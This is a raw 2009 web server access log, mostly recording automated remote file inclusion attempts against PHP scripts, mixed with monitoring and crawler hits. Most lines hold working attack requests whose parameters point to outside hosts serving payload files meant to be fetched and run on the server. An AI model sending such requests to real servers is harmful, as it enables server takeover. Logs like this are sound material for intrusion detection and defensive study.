77.221.130.2 - - [17/May/2009:02:08:40 -0400] "GET /logs/access_log.Q108090400%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:02:08:54 -0400] "GET /logs/access_log.Q108082400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:02:08:54 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
110.45.145.92 - - [17/May/2009:02:08:54 -0400] "GET /logs/access_log.Q109032000//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
110.45.145.92 - - [17/May/2009:02:08:54 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
85.214.86.93 - - [17/May/2009:02:08:55 -0400] "GET /logs/access_log.Q108121900%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:02:09:02 -0400] "GET /logs/access_log.Q108081900//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
110.45.145.92 - - [17/May/2009:02:09:05 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
110.45.145.92 - - [17/May/2009:02:09:05 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
110.45.145.92 - - [17/May/2009:02:09:05 -0400] "GET /logs/access_log.Q109032000//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
110.45.145.92 - - [17/May/2009:02:09:10 -0400] "GET /logs/access_log.Q108081900//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
110.45.145.92 - - [17/May/2009:02:09:12 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
110.45.145.92 - - [17/May/2009:02:09:12 -0400] "GET /logs/access_log.Q109032000//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
110.45.145.92 - - [17/May/2009:02:09:12 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
110.45.145.92 - - [17/May/2009:02:09:17 -0400] "GET /logs/access_log.Q108081900//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.2 - - [17/May/2009:02:09:25 -0400] "GET /logs/access_log.Q109051200%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:02:09:26 -0400] "GET /logs/access_log.Q108112400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:02:09:31 -0400] "GET /logs/access_log.Q108090500/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:02:10:34 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:02:10:34 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 200 1692 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:02:10:34 -0400] "GET /logs/access_log.Q109012300///?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:02:10:40 -0400] "GET /logs/access_log.Q109012300///?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:02:10:40 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:02:10:40 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 200 1692 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:02:10:45 -0400] "GET //include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:02:10:45 -0400] "GET /logs//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:02:10:46 -0400] "GET /logs/access_log.Q108122100%20%20//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:02:11:08 -0400] "GET /logs/access_log.Q108112400%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:02:11:14 -0400] "GET /logs/access_log.Q108120600%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:02:11:19 -0400] "GET /logs/access_log.Q109050900%20%20//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:02:11:25 -0400] "GET /logs/access_log.Q109012800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:02:11:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.59.178 - - [17/May/2009:02:13:06 -0400] "GET /logs/access_log.Q108090200//admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.2 - - [17/May/2009:02:13:49 -0400] "GET /logs/access_log.Q109051200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:02:15:00 -0400] "GET /logs/access_log.Q108112400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:02:15:01 -0400] "GET /logs/access_log.Q108090500/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:15:46 -0400] "GET /logs//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:15:46 -0400] "GET /logs/access_log.Q109020100//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:15:46 -0400] "GET //appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:15:46 -0400] "GET /logs//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:15:46 -0400] "GET /logs/access_log.Q109020100//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:15:46 -0400] "GET //appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:15:53 -0400] "GET /logs/access_log.Q108121900//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:15:54 -0400] "GET /logs/access_log.Q108121900//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:02:16:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.149.235.45 - - [17/May/2009:02:17:10 -0400] "GET /logs/access_log.Q109012300%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:02:17:41 -0400] "GET //install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:02:17:43 -0400] "GET /logs//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:02:17:43 -0400] "GET /logs/access_log.Q108060800%20%20//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:02:17:43 -0400] "GET /logs//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:02:17:43 -0400] "GET /logs/access_log.Q108060800//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:02:17:43 -0400] "GET /logs/access_log.Q109021100//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:02:17:44 -0400] "GET //install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:02:17:45 -0400] "GET /logs/access_log.Q109021100%20%20//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.221.130.2 - - [17/May/2009:02:18:02 -0400] "GET /logs/access_log.Q108100900/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:02:18:02 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:02:18:02 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
66.249.72.114 - - [17/May/2009:02:18:20 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L108004491BE15700700D04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.2 - - [17/May/2009:02:18:20 -0400] "GET /logs/access_log.Q108100900//skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:02:18:20 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:02:18:20 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
81.175.71.121 - - [17/May/2009:02:18:25 -0400] "GET /logs/access_log.Q109012300%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.249.72.114 - - [17/May/2009:02:18:30 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L108004491C01E7007A0D04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [17/May/2009:02:18:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L108004491BB147007A0D04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [17/May/2009:02:18:50 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [17/May/2009:02:18:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L108004491C21E7007E0D04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [17/May/2009:02:19:00 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L108004491B8157007A0D04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [17/May/2009:02:19:10 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L002981419F2006008C3C091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.44.32 - - [17/May/2009:02:20:07 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:02:20:07 -0400] "GET /logs/access_log.Q108072300//skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:02:20:16 -0400] "GET /logs/access_log.Q108110700//skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:02:20:18 -0400] "GET /logs/access_log.Q108072300/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:02:20:19 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:02:20:19 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
211.172.225.50 - - [17/May/2009:02:20:21 -0400] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 404 226 "-" "core-project/1.0"
222.236.44.32 - - [17/May/2009:02:20:30 -0400] "GET /logs/access_log.Q108110700/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
72.32.210.206 - - [17/May/2009:02:21:16 -0400] "GET /logs/access_log.Q109020100%20%20//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:21:20 -0400] "GET /logs/access_log.Q108121900%20%20//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:02:21:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.32.210.206 - - [17/May/2009:02:21:55 -0400] "GET /logs/access_log.Q109020100%20%20//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:21:59 -0400] "GET /logs/access_log.Q108121900%20%20//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:22:23 -0400] "GET /errors.php?error=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:22:23 -0400] "GET /logs/errors.php?error=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.236.44.32 - - [17/May/2009:02:22:53 -0400] "GET /logs/access_log.Q108072300/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:02:22:53 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:02:22:53 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.241.40.51 - - [17/May/2009:02:22:57 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:22:58 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:22:58 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.44.32 - - [17/May/2009:02:22:58 -0400] "GET /logs/access_log.Q108110700/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:02:23:18 -0400] "GET /logs/access_log.Q108072300//skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:02:23:18 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:02:23:18 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:02:23:25 -0400] "GET /logs/access_log.Q108110700//skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
85.214.86.93 - - [17/May/2009:02:23:45 -0400] "GET /logs/access_log.Q108122100//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:02:23:51 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:23:52 -0400] "GET /logs/access_log.Q108072300/skin/zero_vote/ask_password.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:23:52 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:23:52 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:02:23:55 -0400] "GET /logs/access_log.Q108090200//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
110.45.145.92 - - [17/May/2009:02:23:57 -0400] "GET /logs/access_log.Q108090200//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.241.40.51 - - [17/May/2009:02:24:43 -0400] "GET /logs/access_log.Q109051200/skin/zero_vote/ask_password.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:24:51 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:24:51 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:24:51 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:02:24:54 -0400] "GET /logs/access_log.Q108090200//admin/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.241.40.51 - - [17/May/2009:02:24:55 -0400] "GET /logs/access_log.Q108081600%20%20/errors.php?error=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:25:12 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:25:12 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:25:12 -0400] "GET /logs/access_log.Q108072300/skin/zero_vote/ask_password.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:25:45 -0400] "GET /logs/access_log.Q108090800%20%20/errors.php?error=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:02:26:03 -0400] "GET /logs/access_log.Q109051200/skin/zero_vote/ask_password.php?dir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:02:27:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.32.210.206 - - [17/May/2009:02:27:21 -0400] "GET /logs/access_log.Q108082000//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:27:21 -0400] "GET /logs/access_log.Q108120600//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:27:33 -0400] "GET /logs/access_log.Q108082000//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.32.210.206 - - [17/May/2009:02:27:33 -0400] "GET /logs/access_log.Q108120600//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
116.71.160.5 - - [17/May/2009:02:27:39 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
116.71.160.5 - - [17/May/2009:02:27:39 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
116.71.160.5 - - [17/May/2009:02:27:41 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
116.71.160.5 - - [17/May/2009:02:27:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.150.79.146 - - [17/May/2009:02:27:47 -0400] "GET /logs/access_log.Q108121900%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:02:27:47 -0400] "GET /logs/access_log.Q108112400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
